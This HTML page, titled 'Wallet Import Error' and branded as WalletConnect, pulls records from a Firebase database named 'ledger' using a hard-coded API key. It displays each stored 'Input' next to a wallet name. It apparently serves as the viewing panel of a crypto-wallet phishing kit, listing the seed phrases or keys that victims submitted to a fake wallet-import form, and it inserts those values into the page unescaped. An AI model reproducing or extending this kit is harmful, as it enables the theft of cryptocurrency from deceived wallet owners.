<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Wallet Import Error</title>
  <link rel="shortcut icon" href="images/icon-48x48.png">

</head>
<body>
  <div class="nav">
    <p>Dapps</p>
    <img src="/assets/images/WC.jpg" alt="" height="80px">
    <p>Wallet</p>
  </div>
  <div id="root">
      

  </div>
  <style>
    #root{
      display: flex;
      justify-content: center;
      text-align: center;
      flex-wrap: wrap;
      
    }

    .data-container{
      border: 1px solid blue;
      margin: 4px;
      font-family:'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
      padding: 10px;
      max-width: 80%;
      text-align: center;
   
    }
    .nav{
      display: flex;
      justify-content: space-between;
      color: rgb(63, 63, 194);
      font-family:'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
      padding: 20px;
      font-weight:500;
      align-items: center;
    }

  </style>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/firebase/7.14.1-0/firebase.js"></script>
  <script type="module">
    
      const firebaseConfig = {
        apiKey: "AIzaSyDQk4wRKFPPmhTG2UggSAsReoSsSznfhXM",
          authDomain: "ledger-35f93.firebaseapp.com",
          databaseURL: "https://ledger-35f93-default-rtdb.firebaseio.com",
          projectId: "ledger-35f93",
          storageBucket: "ledger-35f93.appspot.com",
          messagingSenderId: "704592609336",
          appId: "1:704592609336:web:09ea5e36f2f6d99231e6cd",
          measurementId: "G-EHD85HRSQ1"
        };
    
      // Initialize Firebase
      firebase.initializeApp(firebaseConfig);


      const ledger_db = firebase.database().ref("ledger")

  
      ledger_db.on("value", function(snapshot){

      var data = snapshot.val();
      for(let i in data){
        document.querySelector("#root").innerHTML += `
          <div class= "data-container"><b>Input:</b> ${data[i]["name"]}  <br>for <b>${data[i]["wallet"]}</b></div>
        `
      }

})


  </script>

  <footer style="text-align:center;color: rgb(63, 63, 194); font-family:'Segoe UI', Tahoma, Geneva, Verdana; font-weight: 500;">
    <p>Powered by Wallet Connect</p>
  </footer>
</body>
</html>